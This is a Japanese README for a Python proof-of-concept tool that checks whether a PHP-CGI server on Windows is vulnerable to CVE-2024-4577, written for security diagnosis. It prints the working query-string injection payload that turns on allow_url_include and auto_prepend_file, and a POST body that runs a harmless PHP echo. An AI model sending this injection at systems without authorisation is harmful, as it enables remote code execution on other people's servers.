
このPythonスクリプトは、PHPの最新の脆弱性であるCVE-2024-4577を診断するためのシンプルなPoC(Proof of Concept)ツールです。
⚠️ 本ツールはセキュリティ診断目的で提供されており、自分が所有するシステムまたは事前に許可を得た対象にのみ使用してください。
この脆弱性は、PHPがWindows環境でCGIモードで動作する際に、マルチバイト文字のバイパスを利用して任意のPHP設定を注入し、コード実行を誘発できる問題です。
このスクリプトは、対象URLに対してクエリ文字列ベースのバイパスペイロードとPHPコードをPOSTリクエストで送信し、脆弱性の有無を判定します。
python3 --version
pip install requests
python3 cve_2024_4577_test.py
入力例:
http://192.168.0.10/index.php
またはルートパスのみを入力しても自動処理されます
http://192.168.0.10
✅ [✅] 脆弱: サーバーがPHPコードを実行しました。
→ このサーバーは脆弱です。
✔️ [✔️] 非脆弱またはブロック済み
→ 応答は受け取ったが、脆弱性は発生しない。
❌ [❌] リクエスト失敗: ...
→ 接続エラー、タイムアウトなどによりテスト失敗。
脆弱性バイパス文字列の挿入:
?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
POST本文にPHPコードを挿入:
<?php echo 'CVE-2024-4577-TEST'; ?>
サーバーがこのコードを実行すると、応答にその文字列が含まれるため判定可能。
このスクリプトは教育およびセキュリティ研究目的でのみ提供されており、許可のないシステムをスキャンまたはテストすることは違法です。ユーザーはすべての責任を自己負担します。
| ファイル名 | 説明 |
|---|---|
cve_2024_4577_test.py | 脆弱性テスト用Pythonスクリプト |
README.md | 使用方法および説明ドキュメント(本ファイル) |
LICENSE.txt |
バグ報告や提案事項は、メールまたはPRでお寄せください。
This project is licensed under the MIT License - see the LICENSE file for details. Copyright (c) 2025 KimJuhyeong95